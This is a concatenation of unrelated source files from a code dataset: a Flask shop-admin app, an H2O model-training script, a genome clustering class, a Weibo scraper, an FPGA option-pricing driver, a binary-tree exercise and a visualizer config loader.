render_template('message.html', user=user, datas=messages)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n\n@app.route('/orderlist', methods=['GET', 'POST'])\ndef orderlist():\n if session.get('if_logged') is not None:\n orders = []\n sales = 0\n user = session.get('user')\n if request.method == 'POST':\n datepicker = request.form.get('date').split('T')\n date = datepicker[0]\n try:\n orders = get_items(date)\n for order in orders:\n sales += int(order['total'])\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n else:\n try:\n current_date = datetime.now().strftime('%Y-%m-%d')\n orders = get_items(current_date)\n for order in orders:\n sales += int(order['total'])\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n if len(orders) == 0:\n flash('No order found')\n return render_template('orderlist.html', user=user, datas=orders, sales=sales)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/admin_products', methods=['GET', 'POST'])\ndef admin_products():\n if session.get('if_logged') is not None:\n products = []\n user = session.get('user')\n items = get_products()\n for product in items:\n images = []\n if 'images' in product:\n if 'profile' in product['images']:\n profileimg = product['images']['profile']['path']\n bucket_name = product['images']['profile']['bucket_name']\n try:\n file = download.download_file(profileimg, bucket_name=bucket_name)\n product['img'] = base64.b64encode(file['data']).decode('ascii')\n product['content_type'] = file['content_type']\n product['profilehasimg'] = True\n except:\n product['profilehasimg'] = False\n else:\n product['profilehasimg'] = False\n if 'images' in product['images']:\n if len(product['images']['images']) != 0:\n for p in product['images']['images']:\n try:\n file = download.download_file(p['path'], p['bucket_name'])\n img = base64.b64encode(file['data']).decode('ascii')\n content_type = file['content_type']\n images.append({'img': img, 'content_type': content_type, 'hasimg': True})\n except:\n product['hasimg'] = False\n product['imgs'] = images\n product['hasimg'] = True\n else:\n product['hasimg'] = False\n product.pop('images')\n else:\n product['profilehasimg'] = False\n product['hasimg'] = False\n products.append(product)\n return render_template('admin-products.html', products=products, user=user)\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/search', methods=['POST'])\ndef search():\n if request.method == 'POST':\n user = session.get('user')\n keyword = request.form.get('keyword')\n search_resp = search_function(keyword)\n if search_resp[1] == 200:\n flash(f\"Found {len(search_resp[0]['results'])} result with {search_resp[0]['keyword']}\")\n return render_template('search.html', user=user, datas=search_resp[0]['results'], keyword=search_resp[0]['keyword'], numb=len(search_resp[0]['results']))\n else:\n flash('No result found')\n return render_template('search.html', user=user, datas=[], keyword=keyword, numb=0)\n return redirect('/orderlist', code=302)\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n if session.get('if_logged') is not None:\n id = request.form.get('itemid')\n delete = delete_item(id)\n flash(f\"{delete[0]}\")\n return redirect(\"/admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n\n@app.route('/delete_message', methods=['POST'])\ndef delete_message():\n if session.get('if_logged') is not None:\n id = request.form.get('itemid')\n delete = delete_msg(id)\n flash(f\"{delete[0]}\")\n return redirect(\"/message\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/edititem', methods=['POST'])\ndef edititem():\n if session.get('if_logged') is not None:\n profile = {}\n images = []\n product = get_product_by_id(request.form.get('itemid'))\n name = product['title']\n description = product['description']\n price = product['price']\n if 'images' in product:\n profile_db = product['images']\n if request.method == 'POST':\n if 'editname' in request.form:\n name = request.form.get('editname')\n if 'editdescription' in request.form:\n description = request.form.get('editdescription')\n if 'editprice' in request.form:\n price = request.form.get('editprice')\n if 'pfimg' in request.files:\n try:\n profileimg = request.files.get('pfimg')\n filepath = os.path.join(app.config['UPLOAD_PATH'], profileimg.filename)\n profileimg.save(filepath)\n resp = upload.upload_file(filepath, profileimg.content_type)\n profile['profile'] = resp\n os.remove(filepath)\n except:\n profile['profile'] = profile_db['profile']\n if 'imgs' in request.files:\n files = request.files.getlist('imgs')\n try:\n for file in files:\n filepath = os.path.join(app.config['UPLOAD_PATH'], file.filename)\n file.save(filepath)\n resp = upload.upload_file(filepath, file.content_type)\n images.append(resp)\n os.remove(filepath)\n profile['images'] = images\n except:\n profile['images'] = profile_db['images']\n update = update_product(request.form.get('itemid'),name,description,int(price), str(profile))\n if update[1] == 200:\n flash('Updated successful')\n else:\n flash('Update item failed')\n return redirect(\"admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\n\n@app.route('/additem', methods=['POST'])\ndef additem():\n if session.get('if_logged') is not None:\n profile = {}\n images = []\n if request.method == 'POST':\n name = request.form.get('name')\n description = request.form.get('description')\n price = request.form.get('price')\n profileimg = request.files.get('profileimg')\n filepath = os.path.join(app.config['UPLOAD_PATH'], profileimg.filename)\n profileimg.save(filepath)\n resp = upload.upload_file(filepath, profileimg.content_type)\n profile['profile'] = resp\n os.remove(filepath)\n files = request.files.getlist('files')\n for file in files:\n filepath = os.path.join(app.config['UPLOAD_PATH'], file.filename)\n file.save(filepath)\n resp = upload.upload_file(filepath, file.content_type)\n images.append(resp)\n os.remove(filepath)\n profile['images'] = images\n add = add_product(name,description,int(price),str(profile))\n if add[1] == 200:\n flash('Added successful')\n else:\n flash('Add item failed')\n return redirect(\"admin_products\")\n else:\n flash('You need to login')\n return redirect('/login', code=302)\ntry:\n app.config.from_pyfile('settings.cfg')\nexcept FileNotFoundError:\n app.config.from_object(Configuration)\n\nupload = FileUpload(**{'api_minio_url': app.config['MINIO_API_URL'],\n 'access_key': app.config['MINIO_ACCESS_KEY'],\n 'secret_key': app.config['MINIO_SECRET_KEY'],\n 'minio_secure': app.config['MINIO_SECURE'],\n 'bucket_name':app.config['MINIO_BUCKET_NAME']})\n\ndownload = FileDownload(**{'api_minio_url': app.config['MINIO_API_URL'],\n 'access_key': app.config['MINIO_ACCESS_KEY'],\n 'secret_key': app.config['MINIO_SECRET_KEY'],\n 'minio_secure': app.config['MINIO_SECURE']})\n\ncnxpool = mysql.connector.pooling.MySQLConnectionPool(pool_name=\"admin-online\",\n host=app.config['HOST'],\n database=app.config['DB'],\n user=app.config['USERS'],\n password=app.config['PASSWORD'],\n port=app.config['PORT'],\n pool_size=20)\nif __name__ == '__main__':\n app.run()","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":28064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580255899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*\n\"\"\"\nCreated on Tue May 26 01:07:34 2020\n\n@author: sruthi\n\"\"\"\n\nimport pandas as pd\nimport h2o\nimport time\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom sklearn.metrics import precision_recall_fscore_support,accuracy_score,confusion_matrix\n\nh2o.init()\n\n\ndf = h2o.import_file(\"/home/sruthi/asm-2/asm-2/1_data/bank.csv\")\ndf['Class'] = df['Class'].asfactor()\n# df['V2'] = df['V2'].asfactor()\n# df['V3'] = df['V3'].asfactor()\n# df['V4'] = df['V4'].asfactor()\n# df['V5'] = df['V5'].asfactor()\n# df['V7'] = df['V7'].asfactor()\n# df['V8'] = df['V8'].asfactor()\n# df['V9'] = df['V9'].asfactor()\n# df['V11'] = df['V11'].asfactor()\n# df['V16'] = df['V16'].asfactor()\ny = 'Class'\nx = df.col_names\nx.remove(y)\n\ntrain, test = df.split_frame(ratios=[.75])\n\n\n\nmodel_bank = H2OGradientBoostingEstimator(ntrees = 100, seed = 25,nfolds=5, max_depth=5,balance_classes=True)\n\n\nstart=time.time()\nmodel_bank.train(x=x, y=y, training_frame=train)\nend=time.time()\n \nt=(end-start)\n\nmodelfile = model_bank.download_mojo(path=\"/home/sruthi/asm-2/asm-2/3_pickle\", get_genmodel_jar=True)\nprint(\"Model saved to \" + modelfile)\n\npred = model_bank.predict(test)\n\n#data_train_all = pd.read_csv(\"/home/sruthi/asm-2/asm-2/1_data/bank_upsampled_train_75.csv\")\n# data_test_all=pd.read_csv(\"/home/sruthi/asm-2/asm-2/1_data/bank_upsampled_test_25.csv\")\n\n# data_train_all=pd.get_dummies(data_train_all,drop_first=False)\n# data_test_all=pd.get_dummies(data_test_all,drop_first=False)\n\n# data_train_h2o=h2o.H2OFrame(data_train_all)\n# data_test_h2o=h2o.H2OFrame(data_test_all)\n\n# data_train_h2o['Class']=data_train_h2o['Class'].asfactor()\n\n# model_bank = H2OGradientBoostingEstimator(ntrees = 50, seed = 25,nfolds=5, max_depth=5) ## Instantiating the class\n\n# model_bank.train(x=data_train_h2o.names[1:],y=data_train_h2o.names[0], training_frame=data_train_h2o, model_id=\"GBM_bank\",\n# validation_frame=data_train_h2o)\n\n# print(model_bank.cross_validation_metrics_summary())\n\n# # perf = model.model_performance()\n# # perf.mean_score()\n# x=data_train_h2o.names[1:]\n# perf = model_bank.model_performance()\na = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[0][0]\nb= model_bank.model_performance(test_data=test).confusion_matrix().to_list()[0][1]\nc = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[1][0]\nd = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[1][1]\nrecall = d / (c+d)\nprecision = d/(b+d)\nf1 = 2*(precision * recall)/(precision + recall)\naccuracy = (a+d)/(a+b+c+d)\nmetrics = {}\nmetrics[\"Accuracy\"]=accuracy\nmetrics[\"Error\"]=1-accuracy\nmetrics[\"Precision\"]=precision\nmetrics[\"Recall\"]=recall\nmetrics[\"FScore\"]=f1\nmetrics[\"Single_training_time\"] = t\nmetrics[\"Cross_validated_Training_time\"] = t\nmetrics[\"Test_time_per_unit\"] = t/11303\nmetrics[\"Confusion_Matrix_rowstrue_colspred\"] = [a,b,c,d]\nmetrics[\"Test_File\"] = \"bank_upsampled_test_25.csv\"\nprint(\"accuracy: \",accuracy)\nprint(\"error,\",1-accuracy)\nprint(\"recall\",recall)\nprint(\"precision\",precision)\nprint(\"f1\",f1)\nprint(\"Training time: \",t) \n\nimport os,json\nif os.path.exists('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json'):\n with open('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json', 'r') as f:\n models = json.load(f)\n models[\"Metrics\"] = metrics\n with open('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json', 'w') as f:\n json.dump(models, f, indent = 2) \n\n# h2o.cluster().shutdown()","sub_path":"source-code/GBE_bank_002.py","file_name":"GBE_bank_002.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122780910","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport fastcluster as fc\nimport scipy.cluster.hierarchy as sch\nfrom scipy.cluster.hierarchy import dendrogram\nimport os.path as path\n\n\ndef printout(message):\n # TODO : Make this a bit more colourful\n print(\"GenomeDataAnalyzer : \" + message)\n\n\nclass GenomeDataAnalyzer:\n def __init__(self, filename=None):\n self._data = None\n self._experiments = None\n self._experience_names = None\n self._clusters = None\n self._cluster_short = None\n\n if not filename:\n self._filename = None\n else:\n self.load(filename)\n\n def load(self, filename):\n if path.isfile(filename):\n self._filename = filename\n self._data = pd.read_table(filename)\n self._clusters = None\n printout(\"File \" + filename + \" loaded\")\n return\n\n printout(\"Could not find file. Is the path correct ?\")\n\n def set_experiments_list(self, experience_names, index_start, index_end):\n if self._data is not None:\n self._experiments = self._data.columns[range(index_start, index_end)]\n self._experience_names = experience_names\n self._compute_triplicates()\n return\n\n print(\"Could not set experiment list, please load data file first\")\n\n def get_cluster_data(self, cluster_id):\n # Get a slice of the array corresponding to a given cluster\n # You can use a gene name (cluster that this gene belongs to), or a cluster number\n\n if isinstance(cluster_id, str):\n i_cluster = self._data[self._data['GeneName'] == cluster_id]['k_index'].values[0]\n return self._data[self._data['k_index'] == i_cluster]\n\n return self._data[self._data['k_index'] == cluster_id]\n\n def list_genes(self):\n if self._data is not None:\n return self._data['GeneName']\n\n printout(\"File is not loaded. Please load a data file first\")\n return\n\n def clusterize(self, n_clusters=20, experiences_to_use=None, metric='euclidean'):\n method = 'complete'\n\n if not self._clusters:\n printout(\"Computing clusters\")\n\n if experiences_to_use:\n cols = experiences_to_use\n else:\n cols = self._experience_names\n\n # - run the hierarchical clustering, then crop to n clusters\n exp_data = self._data.select(lambda x: x in cols, axis=1)\n self._clusters = fc.linkage(exp_data, method=method, metric=metric)\n\n self._cluster_short = sch.fcluster(self._clusters, n_clusters, criterion='maxclust')\n self._data[\"k_index\"] = pd.Series(self._cluster_short, index=self._data[self._experience_names].index)\n printout(\"Data clustered - \" + str(n_clusters) + \" clusters selected\")\n\n def plot_dendrogram(self, save_figure=False, filename=None):\n # TODO: Handle options\n dendrogram(self._cluster_full)\n plt.show()\n\n def plot_gene_cluster(self, gene_name):\n if self._clusters is None:\n self.clusterize()\n\n gene_friends = self.get_cluster_data(gene_name)\n\n for _i in range(len(gene_friends['GeneName'].values)):\n plt.plot(gene_friends[self._experience_names].values[_i, :], label=gene_friends['GeneName'].values[_i])\n\n plt.legend()\n plt.xticks(np.arange(len(self._experience_names)), self._experience_names, rotation=25)\n plt.grid(True)\n plt.title(gene_name + \" cluster\")\n plt.show()\n\n def _compute_triplicates(self):\n printout(\"Computing triplicates\")\n n_real_experiments = int(len(self._experiments)/3)\n\n for i in range(n_real_experiments):\n self._data[self._experience_names[i]] = self._data[self._experiments[3*i:3*i+3]].apply(self._log_mean, axis=1)\n\n names = [name for name in self._experiments[3*i:3*i+3]]\n printout(\"Data points \" + str(names) + \" averaged - Corresponds to experience: \" + self._experience_names[i])\n\n @staticmethod\n def _log_mean(log_values):\n exp_values = np.exp2(log_values)\n return np.log2(np.mean(exp_values))\n\n","sub_path":"DNA Processing/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282483626","text":"# python 3.6.5\n'''\nWeibo has uesd an encoded url link when a new page was refreshed.\nIt was showed below:\nRequest URL: https://m.weibo.cn/api/container/getIndex?type=uid&value=2649634977&containerid=1005052649634977\nand loading more lists '&since_id=4253870366193901' was added to the end of the url.\nthe 'since_id' is no rule to follow.\nBut a few year ago, '&page=1' is same as the '&since_id=1234567890'\nSo the script work well.\n\n'''\nimport requests\nfrom urllib.parse import urlencode\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n 'Referer': 'https://m.weibo.cn/u/2649634977',\n 'X-Requested-With': 'XMLHttpRequest'\n }\n\n\ndef download(page_index):\n data = {\n 'type': 'uid',\n 'value': '2649634977',\n 'containerid': '1076032649634977',\n 'page': page_index\n }\n url = 'https://m.weibo.cn/api/container/getIndex?' + urlencode(data)\n try:\n re = requests.get(url, headers=headers)\n if re.status_code == 200:\n return re.json()\n except requests.ConnectionError as e:\n print(f'this is a error {e.args} when getting {url}')\n\n\ndef parsing(json):\n if json:\n items = json.get('data').get('cards')\n for item in items:\n item = item.get('mblog')\n weibo = {}\n weibo['id'] = item.get('id')\n weibo['created time'] = item.get('created_at')\n weibo['content'] = item.get('raw_text')\n weibo['comment'] = item.get('comments_count')\n yield weibo\n\n\nif __name__ == '__main__':\n for page in range(1, 3):\n json = download(page)\n rslt = parsing(json)\n for item in rslt:\n print(item)\n","sub_path":"my_weibo_account.py","file_name":"my_weibo_account.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98946630","text":"from pynq import DefaultIP\nfrom pynq import Overlay\nfrom pynq import Xlnk\nimport numpy as np\nimport datetime\n\nclass BinomialTreeDriver(DefaultIP):\n def __init__(self, description):\n super().__init__(description=description)\n\n bindto = ['xilinx.com:hls:binomial_tree:1.0']\n\n @property\n def status(self):\n return self.read(0x00)\n \n @status.setter\n def status(self, value):\n self.write(0x00, value)\n\n @property\n def output(self):\n return self.read(0x10)\n\n @output.setter\n def output(self, value):\n self.write(0x10, value)\n\n @property\n def spot_price(self):\n return self.read(0x18)\n\n @spot_price.setter\n def spot_price(self, value):\n self.write(0x18, value)\n\n @property\n def strike_price(self):\n return self.read(0x20)\n\n @strike_price.setter\n def strike_price(self, value):\n self.write(0x20, value)\n\n @property\n def time_to_maturity(self):\n return self.read(0x28)\n\n @time_to_maturity.setter\n def time_to_maturity(self, value):\n self.write(0x28, value)\n\n @property\n def dividend_yield(self):\n return self.read(0x30)\n\n @dividend_yield.setter\n def dividend_yield(self, value):\n self.write(0x30, value)\n \n @property\n def risk_free_rate(self):\n return self.read(0x38)\n\n @risk_free_rate.setter\n def risk_free_rate(self, value):\n self.write(0x38, value)\n\n @property\n def volatility(self):\n return self.read(0x40)\n\n @volatility.setter\n def volatility(self, value):\n self.write(0x40, value)\n\n @property\n def type_r(self):\n return self.read(0x48)\n \n @type_r.setter\n def type_r(self, value):\n self.write(0x48, value)\n\n @property\n def height(self):\n return self.read(0x50)\n \n @height.setter\n def height(self, value):\n self.write(0x50, value)\n \n @property\n def n_options(self):\n return self.read(0x58)\n \n @n_options.setter\n def n_options(self, value):\n self.write(0x58, value)\n\n# Load bitstream\nt0 = datetime.datetime.now()\noverlay = Overlay(\"./overlay/us_binomial_tree.bit\")\nBinomialTree = overlay.binomial_tree\nt1 = datetime.datetime.now()\n\n# Time taken in seconds\ndelta = t1 - t0\nprint(\"Loaded bitstream in (seconds): \", (delta.microseconds / 1000000) + delta.seconds)\n\n# Load option data\noption_data = np.loadtxt(\"option_data.txt\", comments=\"#\", delimiter=\",\", unpack=False)\n\n# Allocate memory\nxlnk = Xlnk()\nif(option_data.ndim > 1):\n n_options = len(option_data)\n \n if n_options > 25:\n n_options = 25\nelse:\n n_options = 1\n\n# Allocate memory\noutput = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nS = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nK = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nT = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nD = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nr = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nv = xlnk.cma_array(shape=(n_options), dtype=np.float32)\ntype_r = xlnk.cma_array(shape=(n_options), dtype=np.int32)\nheight = xlnk.cma_array(shape=(n_options), dtype=np.int32)\n\nprint(\"Number of options: \", n_options)\n\n# Read in option data\nif(option_data.ndim > 1): # 2 or more options\n for i in range(n_options):\n S[i] = option_data[i][0]\n K[i] = option_data[i][1]\n T[i] = option_data[i][2]\n D[i] = option_data[i][3]\n r[i] = option_data[i][4]\n v[i] = option_data[i][5]\n type_r[i] = option_data[i][6]\n if(option_data[i][7] > 30000):\n height[i] = 30000\n elif(option_data[i][7] < 2):\n height[i] = 2\n else:\n height[i] = option_data[i][7]\nelse: # 1 option\n S[0] = option_data[0]\n K[0] = option_data[1]\n T[0] = option_data[2]\n D[0] = option_data[3]\n r[0] = option_data[4]\n v[0] = option_data[5]\n type_r[0] = option_data[6]\n if(option_data[7] > 30000):\n height[0] = 30000\n elif(option_data[7] < 2):\n height[i] = 2\n else:\n height[0] = option_data[7]\n\n# Define status codes\nap_start = 1\nap_done = 2\nap_idle = 4\nap_ready = 8\n\n# Transfer data to FPGA\nBinomialTree.output = output.physical_address\nBinomialTree.spot_price = S.physical_address\nBinomialTree.strike_price = K.physical_address\nBinomialTree.time_to_maturity = T.physical_address\nBinomialTree.dividend_yield = D.physical_address\nBinomialTree.risk_free_rate = r.physical_address\nBinomialTree.volatility = v.physical_address\nBinomialTree.type_r = type_r.physical_address\nBinomialTree.height = height.physical_address\nBinomialTree.n_options = n_options\n\nt0 = datetime.datetime.now()\nstatus = 0\n\n# Run IP on FPGA\nif (BinomialTree.status == ap_idle) or (BinomialTree.status == ap_ready):\n BinomialTree.status = ap_start\n \n while(status != ap_idle):\n status = BinomialTree.status\n\nt1 = datetime.datetime.now()\n\n# Time taken in seconds\ndelta = t1 - t0\nprint(\"Time taken (seconds): \", (delta.microseconds / 1000000) + delta.seconds)\nprint(output)\n","sub_path":"MSc Project/Binomial Tree/American/PYNQ-Z2/usbinomialtree.py","file_name":"usbinomialtree.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"226196296","text":"class Height(object):\n @staticmethod\n def __init__(self):\n self.height = 0\n\n\nclass NodeBt(object):\n def __init__(self, value=None, level=1):\n self.value = value\n self.level = level\n self.left = None\n self.right = None\n\n def __repr__(self):\n return \"{}\".format(self.value)\n\n def _add_next_node(self, value, level_here=2):\n new_node = NodeBt(value, level_here)\n if not self.value:\n self.value = new_node\n elif not self.left:\n self.left = new_node\n elif not self.right:\n self.right = new_node\n else:\n self.left = self.left._add_next_node(value, level_here+1)\n return self\n\n def _search_for_node(self, value):\n if self.value == value:\n return self\n else:\n found = None\n if self.left:\n found = self.left._search_for_node(value)\n if self.right:\n found = found or self.left._search_for_node(value)\n return found\n\n def _is_leaf(self):\n return not self.right and not self.left\n\n def _get_max_height(self):\n heightr, heightl = 0,0\n if self.right:\n heightr = self.right._get_max_height()+1\n if self.left:\n heightl = self.left._get_max_height()+1\n return max(heightl, heightr)\n\n def _is_balanced(self, height=Height()):\n lh = Height()\n rh = Height()\n if self.value is None:\n return True\n l, r = True, True\n if self.left:\n l = self.left._is_balanced(lh)\n if self.right:\n r = self.right._is_balanced(rh)\n height.height = max(lh.height, rh.height) +1\n if abs(lh.height-rh.height) <=1:\n return l and r\n return False\n\n def _is_bst(self, left = None, right = None):\n if self.value:\n if left and self.valueright:\n return False\n\n l, r = True, True\n if self.left:\n l = self.left._is_bst(left, self.value)\n if self.right:\n r = self.right._is_bst(self.value, right)\n return l and r\n else:\n return True\n\nclass BinaryTree(object):\n def __init__(self):\n self.root = None\n\n def add_node(self, value):\n if not self.root:\n self.root = NodeBt(value)\n else:\n self.root._add_next_node(value)\n\n def is_leaf(self, value):\n node = self.root._search_for_node(value)\n if node:\n return node._is_leaf()\n else:\n return False\n\n def get_node_level(self, value):\n node = self.root._search_for_node(value)\n if node:\n return node.level\n else:\n return False\n\n def is_root(self, value):\n return self.root.value == value\n\n def get_height(self):\n return self.root._get_max_height()\n\n def is_balanced(self):\n return self.root._is_balanced()\n\n def is_bst(self):\n return self.root._is_bst()\n\nif __name__ == \"__main__\":\n bt = BinaryTree()\n for i in range(1, 10):\n bt.add_node(i)\n print(\"노드 8은 말단 노드입니까?\", bt.is_leaf(8))\n print(\"노드 8의 레벨은?\", bt.get_node_level(8))\n print(\"노드 10은 루트 노드입니까?\", bt.is_root(10))\n print(\"노드 1은 루트 노드입니까?\", bt.is_root(1))\n print(\"트리의 높이는?\", bt.get_height())\n print(\"이진 탐색 트리입니까?\", bt.is_bst())\n print(\"균형 트리입니까?\", bt.is_balanced())\n\n","sub_path":"풀었던 문제들/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"432152602","text":"# -*- Mode: Python; indent-tabs-mode: t; python-indent: 4; tab-width: 4 -*-\n\nimport os\nimport shutil\n\nfrom configparser import ConfigParser\nfrom gi.repository import Gdk\nfrom cavalcade.logger import logger\nfrom cavalcade.common import AttributeDict, WINDOW_HINTS, AccelCheck\n\nGTK_WINDOW_TYPE_HINTS = [getattr(Gdk.WindowTypeHint, hint) for hint in WINDOW_HINTS]\nDEFAULT_WALLPAPER_FILE = \"DefaultWallpaper.svg\"\naccel = AccelCheck()\n\n\ndef str_to_rgba(hex_):\n\t\"\"\"Translate color from hex string to Gdk.RGBA\"\"\"\n\tpure_hex = hex_.lstrip(\"#\")\n\tnums = [int(pure_hex[i:i + 2], 16) / 255.0 for i in range(0, 7, 2)]\n\treturn Gdk.RGBA(*nums)\n\n\ndef rgba_to_str(rgba):\n\t\"\"\"Translate color from Gdk.RGBA to hex format\"\"\"\n\treturn \"#%02X%02X%02X%02X\" % tuple(int(getattr(rgba, name) * 255) for name in (\"red\", \"green\", \"blue\", \"alpha\"))\n\n\nclass ConfigBase(dict):\n\t\"\"\"Base for config manager\"\"\"\n\tsystem_location = (os.path.join(os.path.dirname(os.path.abspath(__file__)), \"data\"),)\n\tpath = os.path.expanduser(\"~/.config/cavalcade\")\n\n\tdef __init__(self, name, pattern=None):\n\t\tsuper().__init__()\n\t\tself.name = name\n\t\tself.pattern = pattern if pattern is not None else {}\n\t\tself.is_fallback = False\n\n\t\t# read functions\n\t\tself.reader = {\n\t\t\tint: lambda section, option: self.parser.getint(section, option),\n\t\t\tbool: lambda section, option: self.parser.getboolean(section, option),\n\t\t\tstr: lambda section, option: self.parser.get(section, option),\n\t\t\tfloat: lambda section, option: self.parser.getfloat(section, option),\n\t\t\t\"ilist\": lambda section, option: [int(v.strip()) for v in self.parser.get(section, option).split(\";\")],\n\t\t\t\"hint\": lambda section, option: getattr(Gdk.WindowTypeHint, self.parser.get(section, option)),\n\t\t\t\"accel\": lambda section, option: self.parser.get(section, option),\n\t\t\tGdk.RGBA: lambda section, option: str_to_rgba(self.parser.get(section, option)),\n\t\t}\n\n\t\t# write functions\n\t\tself.writer = {\n\t\t\tint: lambda value: str(value),\n\t\t\tbool: lambda value: str(int(value)),\n\t\t\tstr: lambda value: value,\n\t\t\tfloat: lambda value: \"{:.2f}\".format(value),\n\t\t\t\"ilist\": lambda value: \";\".join(str(i) for i in value),\n\t\t\t\"hint\": lambda value: value.value_nick.upper(),\n\t\t\t\"accel\": lambda value: value,\n\t\t\tGdk.RGBA: lambda value: rgba_to_str(value),\n\t\t}\n\n\t\t# init\n\t\tself._init_config_file()\n\t\tself._load_config_file()\n\n\tdef _init_config_file(self):\n\t\t\"\"\"Setup user config directory and file\"\"\"\n\t\tfor path in self.system_location:\n\t\t\tcandidate = os.path.join(path, self.name)\n\t\t\tif os.path.isfile(candidate):\n\t\t\t\tself.defconfig = candidate\n\t\t\t\tbreak\n\n\t\tif not os.path.exists(self.path):\n\t\t\tos.makedirs(self.path)\n\n\t\tself.file = os.path.join(self.path, self.name)\n\n\t\tif not os.path.isfile(self.file):\n\t\t\tshutil.copyfile(self.defconfig, self.file)\n\t\t\tlogger.info(\"New configuration file was created:\\n%s\" % self.file)\n\n\tdef _load_config_file(self):\n\t\t\"\"\"Read raw config data\"\"\"\n\t\tself.parser = ConfigParser()\n\t\ttry:\n\t\t\tself.parser.read(self.file)\n\t\t\tself.read_data()\n\t\t\tlogger.debug(\"User config '%s' successfully loaded.\" % self.name)\n\t\texcept Exception:\n\t\t\tself.is_fallback = True\n\t\t\tlogger.exception(\"Fail to read '%s' user config:\" % self.name)\n\t\t\tlogger.info(\"Trying with default config...\")\n\t\t\tself.parser.read(self.defconfig)\n\t\t\tself.read_data()\n\t\t\tlogger.debug(\"Default config '%s' successfully loaded.\" % self.name)\n\n\tdef read_data(self):\n\t\t\"\"\"Transform raw config data to user specified types\"\"\"\n\t\tfor section in self.pattern.keys():\n\t\t\tself[section] = dict()\n\t\t\tfor option, pattern in self.pattern[section].items():\n\t\t\t\treader = self.reader[pattern.type]\n\t\t\t\tself[section][option] = reader(section, option)\n\t\t\t\tif \"valid\" in pattern and self[section][option] not in pattern.valid:\n\t\t\t\t\traise Exception(\"Bad value for '%s' in '%s'\" % (option, section))\n\n\tdef write_data(self):\n\t\t\"\"\"Transform user specified data to raw config parser strings\"\"\"\n\t\tfor section in self.pattern.keys():\n\t\t\tfor option, pattern in self.pattern[section].items():\n\t\t\t\twriter = self.writer[pattern.type]\n\t\t\t\tself.parser[section][option] = writer(self[section][option])\n\n\tdef save_data(self):\n\t\t\"\"\"Save settings to file\"\"\"\n\t\twith open(self.file, 'w') as configfile:\n\t\t\tself.parser.write(configfile)\n\n\nclass CavaConfig(ConfigBase):\n\t\"\"\"CAVA config manager\"\"\"\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"cava.ini\", dict(\n\t\t\t\tgeneral = dict(\n\t\t\t\t\tbars = AttributeDict(type=int),\n\t\t\t\t\tsensitivity = AttributeDict(type=int),\n\t\t\t\t\tframerate = AttributeDict(type=int),\n\t\t\t\t\tlower_cutoff_freq = AttributeDict(type=int),\n\t\t\t\t\thigher_cutoff_freq = AttributeDict(type=int),\n\t\t\t\t\tautosens = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\toutput = dict(\n\t\t\t\t\tmethod = AttributeDict(type=str, valid=[\"raw\"]),\n\t\t\t\t\traw_target = AttributeDict(type=str),\n\t\t\t\t\tchannels = AttributeDict(type=str),\n\t\t\t\t\tbit_format = AttributeDict(type=str, valid=[\"16bit\", \"8bit\"]),\n\t\t\t\t),\n\t\t\t\tsmoothing = dict(\n\t\t\t\t\tgravity = AttributeDict(type=int),\n\t\t\t\t\tintegral = AttributeDict(type=int),\n\t\t\t\t\tignore = AttributeDict(type=int),\n\t\t\t\t\tmonstercat = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t)\n\t\t)\n\n\tdef read_data(self):\n\t\tsuper().read_data()\n\t\tself[\"eq\"] = [float(v) for v in self.parser[\"eq\"].values()]\n\n\tdef write_data(self):\n\t\tsuper().write_data()\n\n\t\tfor i, key in enumerate(self.parser[\"eq\"].keys()):\n\t\t\tself.parser[\"eq\"][key] = \"{:.2f}\".format(self[\"eq\"][i])\n\n\t\tself.save_data()\n\n\nclass MainConfig(ConfigBase):\n\t\"\"\"Main application config manager\"\"\"\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"main.ini\", dict(\n\t\t\t\tdraw = dict(\n\t\t\t\t\tpadding = 